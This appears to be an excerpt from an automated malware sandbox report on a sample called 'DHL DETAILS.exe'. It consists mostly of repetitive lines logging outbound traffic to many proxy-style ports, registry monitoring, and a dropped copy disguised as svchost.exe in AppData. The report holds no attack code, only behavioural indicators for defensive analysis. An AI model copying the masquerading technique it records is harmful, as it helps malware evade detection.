                Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 41890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51289 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 31653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50872 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51325
                Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 7890
                Source: unknownNetwork traffic detected: HTTP traffic on port 51145 -> 60589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50736 -> 808
                Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 51027 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51015 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 44607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51022 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51628 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 51327 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 51610 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 14398
                Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 7237
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51452
                Source: unknownNetwork traffic detected: HTTP traffic on port 51648 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51649 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 38242
                Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51474
                Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51638 -> 3000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51703 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 6666
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51473
                Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 6010
                Source: unknownNetwork traffic detected: HTTP traffic on port 51635 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51639 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51292 -> 57447
                Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51663 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51259 -> 64935
                Source: unknownNetwork traffic detected: HTTP traffic on port 9400 -> 51546
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 51655 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 9500
                Source: unknownNetwork traffic detected: HTTP traffic on port 51657 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 61818
                Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 61725
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51542
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 51750 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51645 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51763 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51641 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 51545
                Source: unknownNetwork traffic detected: HTTP traffic on port 5811 -> 51567
                Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 6087 -> 51550
                Source: unknownNetwork traffic detected: HTTP traffic on port 51808 -> 11096
                Source: unknownNetwork traffic detected: HTTP traffic on port 51700 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51691 -> 38832
                Source: unknownNetwork traffic detected: HTTP traffic on port 51706 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 8989
                Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 8002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51306 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 16993
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51226
                Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 51574
                Source: unknownNetwork traffic detected: HTTP traffic on port 51777 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 51342 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 57745
                Source: unknownNetwork traffic detected: HTTP traffic on port 51834 -> 55425
                Source: unknownNetwork traffic detected: HTTP traffic on port 51871 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50343
                Source: unknownNetwork traffic detected: HTTP traffic on port 51821 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51817 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50131
                Source: unknownNetwork traffic detected: HTTP traffic on port 51893 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51833 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51835 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 10471
                Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51337 -> 1981
                Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51828 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51815 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51772 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51961 -> 8585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51851 -> 8193
                Source: C:\Users\user\Desktop\DHL DETAILS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
